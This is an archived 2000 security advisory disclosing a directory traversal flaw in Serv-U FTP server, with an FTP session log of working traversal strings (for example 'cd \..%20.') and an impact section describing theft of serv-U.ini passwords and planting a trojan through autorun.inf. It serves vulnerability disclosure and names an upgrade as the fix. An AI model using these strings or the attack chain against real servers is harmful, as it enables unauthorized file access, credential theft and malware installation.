Securax-SA-09.serv-u

2000-12-05T00:00:00
ID PACKETSTORM:23759
Type packetstorm
Reporter Zoa_Chien
Modified 2000-12-05T00:00:00

Description

                                        
                                            `  
=====================================================================  
Securax-SA-09 Security Advisory  
belgian.networking.security Dutch  
=====================================================================  
Topic: Catsoft serv-U FTP Directory Transversal Vulnerability  
Announced: 2000-12-03  
Updated: 2000-12-03  
tested on: serv-U ftp 2.4a, 2.5h, 3.0bèta,... (all versions ?)  
Not affected: ?  
Obsoletes: /  
http://www.securax.org/pers/  
=====================================================================  
  
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR  
RESULTS. THEREFORE WE CANNOT ENSURE THE INFORMATION BELOW IS  
100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR  
NOTICE.  
PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING  
THE BUG DISCUSSED IN THIS ADVISORY, SHARE THIS ON BUQTRAQ.  
THANK YOU,  
  
  
  
I. Background  
  
Lets just dump what i tried: (skip this)  
  
  
Normal use: 1.txt is a file in the homedir.  
ftp> get 1.txt  
200 PORT Command successful.  
150 Opening ASCII mode data connection for 1.txt (7 bytes).  
226 Transfer complete.  
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)  
  
Lets see what happens to hex codes: %2E=. %31=1 %20=space ...  
  
ftp> get 1%2etxt  
200 PORT Command successful.  
550 /1%2etxt: No such file or directory.  
ftp>  
  
--> %2e is not decoded  
  
ftp> get 1.%20txt  
200 PORT Command successful.  
550 /1. txt: No such file or directory.  
  
--> %20 is decoded to a space. (to be compatible with browsers)  
  
ftp> get %201.txt  
200 PORT Command successful.  
150 Opening ASCII mode data connection for 1.txt (7 bytes).  
226 Transfer complete.  
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)  
  
--> hey, look if the space is in the beginning of the filename,  
it is just skipped.  
  
Lets try this on the cd command:  
  
ftp> cd \.a%20\  
550 /.a: No such file or directory.  
  
--> space is skipped again...  
  
ftp> cd \a%20a\  
550 /a a: No such file or directory.  
ftp>  
  
ftp> cd \a%20.\  
550 /a: No such file or directory.  
ftp>  
  
--> heh ? wtf, the %20 will remove the .  
  
Lets try to play around with that:  
  
ftp> cd \.%20.  
250 Directory changed to /Ftproot  
  
--> Hey, look the ftp client reveals the ftp dir... thats fun  
  
Lets keep playing  
  
ftp> cd \..%20.  
250 Directory changed to /..  
  
--> oh ow, this looks like trouble  
  
ftp> dir  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
-rwxrwxrwx 1 user group 1127 Nov 30 22:06 rootdir.txt  
...  
226 Transfer complete.  
1180 bytes received in 0.00 seconds (1180000.00 Kbytes/sec)  
ftp>  
  
Ouch, that hurts...  
  
ftp> cd %20..%20%20../winnt\  
250 Directory changed to /c:/TOMB/../WINNT  
ftp>  
  
You can only use this when you are in your homedir.  
You can only use GET ... when you are in your homedir  
so first changing to /winnt and then "get" will not work  
  
ftp> put autoexec.bat %20..%20%20../winnt/2.bat  
200 PORT Command successful.  
150 Opening ASCII mode data connection for 2.bat.  
226 Transfer complete.  
ftp> dir \..%20.\..%20.\winnt\  
  
  
II. Problem Description  
  
- Serv-U ftp will:  
reveal the full path to the ftproot with: cd \.%20.  
(even if "show path relative to home dir"-option is on )  
Using pwd will work too.  
  
- allow read/write/execute/list axx to any other file on  
the partition of the ftproot if you have read/write/exec/list  
acces on your home dir.  
note that the option inherit subdirs must be clicked on.  
(otherwise "cd" will not work)  
- Serv-U will allow listing of hidden files, even if  
"hide hidden files is on" with "DIR ."  
  
- The exploit also works on serv-U ftp 2.4a... but you might  
have to use a different string.:  
dir %20..%20%20..\*.  
  
III. Impact:  
  
This is a severe bug and should be patched asap.  
If the ftproot is on the c:drive, serv-U.ini can be retrieved  
which contains all passwords of the ftp users.  
(and can be brute forced with john the ripper)  
That way, you could find logins that allow executing... and  
you can upload and execute a trojan.  
  
Even if the ftproot is not on the same drive as serv-u.ini,  
you can still upload a trojan and make this trojan execute  
by using an autorun.inf on e.g.: d:\ wich points to our trojan  
If the sysadmin uses "My Computer" instead of explorer.exe,  
the trojan will be executed.  
  
IV. Solution  
  
Upgrade to version 2.5i, available at:  
http://ftpserv-u.deerfield.com/download/  
  
V. Credits  
  
Zoa_Chien (zoachien@securax.org)  
Elias (pwd revealing full path)  
  
VI. Source code  
none.  
  
  
---  
... And they will all go down together ...  
  
Advertising:  
[Zoa_Chien is currently looking for a new job, contact me at  
zoachien@securax.org +32/496.45.29.89 for a resume.]  
  
  
  
  
`